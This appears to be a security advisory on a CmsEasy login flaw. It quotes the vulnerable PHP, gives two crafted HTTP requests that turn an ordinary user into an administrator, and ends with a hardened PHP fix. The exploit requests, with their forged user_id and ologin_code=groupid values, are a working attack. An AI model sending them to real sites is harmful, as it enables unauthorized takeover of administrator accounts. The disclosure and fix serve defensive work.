CmsEasy logic flaw: an ordinary user can escalate to administrator (is getting a shell still hard?)
user_act.php (lines 130-155):
if (front::post('submit')) {
    if (front::post('username') && front::post('password')) {
        $username = front::post('username');
        $password = md5(front::post('password'));
        $data = array(
            'username' => $username,
            'password' => $password,
        );
        $user = new user();
        $row = $user->getrow(array('username' => $data['username'], 'password' => $data['password']));
        if (!is_array($row)) {
            $this->login_false();
            return;
        }
        // $classname comes from the ologin_code request parameter and is used
        // unchecked as the name of the user-table column that receives the openid
        $post[$classname] = session::get('openid');
        $this->_user->rec_update($post, 'userid=' . $row['userid']);
        cookie::set('login_username', $row['username']);
        cookie::set('login_password', front::cookie_encode($row['password']));
        session::set('username', $row['username']);
        front::redirect(url::create('user'));
        return;
    } else {
        $this->login_false();
        return;
    }
}
Step 1: register a user named test with the password 111111.
Then send this request:
URL: http://localhost/uploads/index.php?case=user&act=respond&ologin_code=groupid
POST data:
username=test&password=111111&submit=xxx
Step 2: look at this line:
$post[$classname] = session::get('openid');
Here $classname is the groupid we passed in, so the update writes the session's openid into the groupid column of our user. The problem is that session::get('openid') does not exist at this point, so after execution the groupid of the test user is simply 0.
Next, we look for a place where openid is set.
Lines 157-172:
include_once ROOT . '/lib/plugins/ologin/' . $classname . '.php';
$ologinobj = new $classname();
$status = $ologinobj->respond();
//var_dump(session::get('openid'));exit;
$where[$classname] = session::get('openid');
if (!$where[$classname]) front::redirect(url::create('user'));
$user = new user();
$data = $user->getrow($where);
if (!$data) {
    $this->view->data = $status;
} else {
    cookie::set('login_username', $data['username']);
    cookie::set('login_password', front::cookie_encode($data['password']));
    session::set('username', $data['username']);
    front::redirect(url::create('user'));
}
This part looks up a user by the plugin's column and writes the login session data; we can ignore it. What we care about is whether the openid set here, by the plugin's respond() method, is controllable.
When $classname is alipaylogin, the plugin loaded is lib/plugins/ologin/alipaylogin.php, whose respond() is:
function respond() {
    ini_set("display_errors", "On");
    $where = array('login_code' => front::$get['login_code']);
    $ologins = ologin::getInstance()->getrows($where);
    $ologin = unserialize_config($ologins[0]['ologin_config']);
    //var_dump($ologin);
    // everything below only assembles the Alipay configuration
    $aliapy_config['partner'] = $ologin['alipaylogin_id'];
    $aliapy_config['key'] = $ologin['alipaylogin_key'];
    $aliapy_config['return_url'] = ologin::url(basename(__FILE__, '.php'));
    $aliapy_config['sign_type'] = 'md5';
    $aliapy_config['input_charset'] = 'utf-8';
    $aliapy_config['transport'] = 'http';
    $aliapy_config['cacert'] = getcwd() . '/lib/plugins/alipayauth/cacert.pem';
    //var_dump($aliapy_config);
    unset($_GET['case']);
    unset($_GET['act']);
    unset($_GET['login_code']);
    unset($_GET['site']);
    require_once("alipayauth/alipay_notify.class.php");
    $alipayNotify = new AlipayNotify($aliapy_config);
    //var_dump($alipayNotify);
    $verify_result = $alipayNotify->verifyReturn();
    //var_dump($verify_result);
    if (true | $verify_result) { // "verification successful": this is always true
        $user_id = front::$get['user_id'];
        $token = front::$get['token'];
        session::set('access_token', $token);
        session::set("openid", $user_id);
        return array('nickname' => front::get('real_name'));
    }
    // ... (rest of the function not shown in the original)
}
If (true | $ verify_result) {// verify the success of this line so that it will always be true because before this is all about configuration information
Let's take a look at this.
$user_id = front::$get['user_id'];
$token = front::$get['token'];
session::set('access_token', $token);
session::set("openid", $user_id);
return array('nickname' => front::get('real_name'));
So the openid is fully controllable: it is copied straight from the user_id GET parameter, with no verification at all.
URL:
http://localhost/uploads/index.php?case=user&act=respond&ologin_code=alipaylogin&user_id=2&real_name=test
After this request, the openid in our session is 2.
Now go back to the first request and send it again in the same session:
URL:
http://localhost/uploads/index.php?case=user&act=respond&ologin_code=groupid
POST data:
username=test&password=111111&submit=xxx
This time session::get('openid') returns 2, so the update writes groupid=2 for the test user.
Now check the test user's group: it is 2, the administrator group, and logging in to the back end confirms the account is now an administrator.
Solution:
Stricter filtering: only accept an ologin_code that names an installed ologin plugin, never use it as a user-table column name, and act on the Alipay verification result instead of short-circuiting it with true.
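As an added example (not CmsEasy's own code), the following hardens both places discussed above: ologin_code is whitelisted against a fixed plugin-to-column map and against the plugin files that actually exist, so the client can no longer choose groupid as the column written in the binding step, and the Alipay callback only sets openid when verifyReturn() succeeded. It assumes the framework calls seen in the quoted code (front::get/post, session::get/set, cookie::set, url::create, the user model's getrow()/rec_update(), and login_false(), _user and view from the real user_act class); the names user_act_hardened, respond_action() and alipaylogin_finish() are the example's own.

```php
<?php
// Added example, not CmsEasy's own code. Assumed to sit beside the real
// user_act class, which provides login_false(), $this->_user and $this->view.
class user_act_hardened extends user_act
{
    // Plugin name -> user-table column holding that plugin's openid.
    // Only names listed here can be used, so 'groupid' (or any other column)
    // can no longer be selected by the client.
    private static $ologin_columns = array(
        'alipaylogin' => 'alipaylogin',
    );

    // Resolve the ologin_code parameter against the map and against the files
    // that really exist under lib/plugins/ologin/. Returns null on any mismatch.
    private function resolve_plugin($requested)
    {
        if (!is_string($requested) || !preg_match('/^[a-z0-9_]{1,32}$/', $requested)) {
            return null;
        }
        if (!isset(self::$ologin_columns[$requested])) {
            return null;
        }
        $file = ROOT . '/lib/plugins/ologin/' . $requested . '.php';
        return is_file($file) ? $requested : null;
    }

    public function respond_action()
    {
        $classname = $this->resolve_plugin(front::get('ologin_code'));
        if ($classname === null) {
            front::redirect(url::create('user'));
            return;
        }
        $column = self::$ologin_columns[$classname];

        if (front::post('submit')) {
            // Binding an existing account to the openid obtained in this session.
            $openid = session::get('openid');
            if (!$openid || !front::post('username') || !front::post('password')) {
                $this->login_false();
                return;
            }
            $row = $this->_user->getrow(array(
                'username' => front::post('username'),
                'password' => md5(front::post('password')),
            ));
            if (!is_array($row)) {
                $this->login_false();
                return;
            }
            // Fixed column name, integer-cast userid, and the openid is consumed
            // so the same session value cannot be bound a second time.
            $this->_user->rec_update(array($column => $openid), 'userid=' . intval($row['userid']));
            session::set('openid', null);
            cookie::set('login_username', $row['username']);
            cookie::set('login_password', front::cookie_encode($row['password']));
            session::set('username', $row['username']);
            front::redirect(url::create('user'));
            return;
        }

        // Callback from the (whitelisted) plugin: look the user up by the
        // plugin's own column only.
        include_once ROOT . '/lib/plugins/ologin/' . $classname . '.php';
        $ologinobj = new $classname();
        $status = $ologinobj->respond();
        $openid = session::get('openid');
        if (!$openid) {
            front::redirect(url::create('user'));
            return;
        }
        $data = $this->_user->getrow(array($column => $openid));
        if (!$data) {
            $this->view->data = $status;
        } else {
            cookie::set('login_username', $data['username']);
            cookie::set('login_password', front::cookie_encode($data['password']));
            session::set('username', $data['username']);
            front::redirect(url::create('user'));
        }
    }
}

// Tail of alipaylogin.php's respond(): act on the verification result instead
// of ORing it with true. Everything before $verify_result stays as it was.
function alipaylogin_finish($verify_result)
{
    if (!$verify_result) {
        session::set('openid', null);
        session::set('access_token', null);
        return array('error' => 'alipay return signature did not verify');
    }
    session::set('access_token', front::$get['token']);
    session::set('openid', front::$get['user_id']);
    return array('nickname' => front::get('real_name'));
}
```

With this in place, the first request of the chain (ologin_code=alipaylogin&user_id=2) no longer sets openid unless Alipay actually signed the return, and the second request (ologin_code=groupid) is rejected before any database write because groupid is not an installed plugin.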